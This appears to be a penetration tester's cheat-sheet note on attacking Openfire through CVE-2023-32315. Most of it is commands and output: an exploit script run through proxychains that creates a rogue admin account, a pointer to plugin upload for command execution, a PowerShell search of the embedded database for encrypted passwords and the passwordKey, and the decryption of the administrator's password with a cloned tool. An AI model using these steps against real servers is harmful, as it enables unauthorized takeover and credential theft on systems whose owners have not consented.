Openfire
CVE-2023-32315
Will create an admin user you can connect with
(venv) user@host:/tmp/CVE-2023-32315$ proxychains -q -f /tmp/TARGET python3 CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01wfjwtqsu4pm9db2qwuymjf71.node0 + csrf: UoYm8eG8pyHq9cf
User added successfully: url: http://127.0.0.1:9090 username: 4lc588 password: ddz4yl
You can upload a plugin for command execution
Users Dump
Passwords are encrypted (not hashed), you can therefore decrypt them
Depending of DB you can retrieve encrypted passwords from files :
select-string -erroraction 'silentlycontinue' " OFUSER ","passwordKey" "C:\Program Files\Openfire\embedded-db\*"|Out-String -width 999
openfire.log:5:INSERT INTO OFUSER VALUES('4lc588',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'001718712585459','001718712585459')
openfire.log:7:DELETE FROM OFUSER WHERE USERNAME='4lc588'
openfire.log:8:INSERT INTO OFUSER VALUES('4lc588','8HrMfkZMynmNvENRHv4NEMXE9xo=','WpM52WO+P5gH++q+MHwKAstnwFE=','aVmbZt7QxrqC19ZV/N+GjdnlPID32Le3',4096,NULL,'e4053e1b3d2c3e372b09f9adb67abaff719e04fe1dc3fb53',NULL,NULL,'001718712585459','001718712585459')
openfire.script:95:INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@bla.bla','001700223740785','0')
openfire.script:113:INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
Look for the passwordKey value, and encrypted passwords of users
then, use this project to decrypt passwords : https://github.com/c0rdis/openfire_decrypt
git clone https://github.com/c0rdis/openfire_decrypt.git /tmp/openfire_decrypt
cd /tmp/openfire_decrypt
javac OpenFireDecryptPass.java
java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)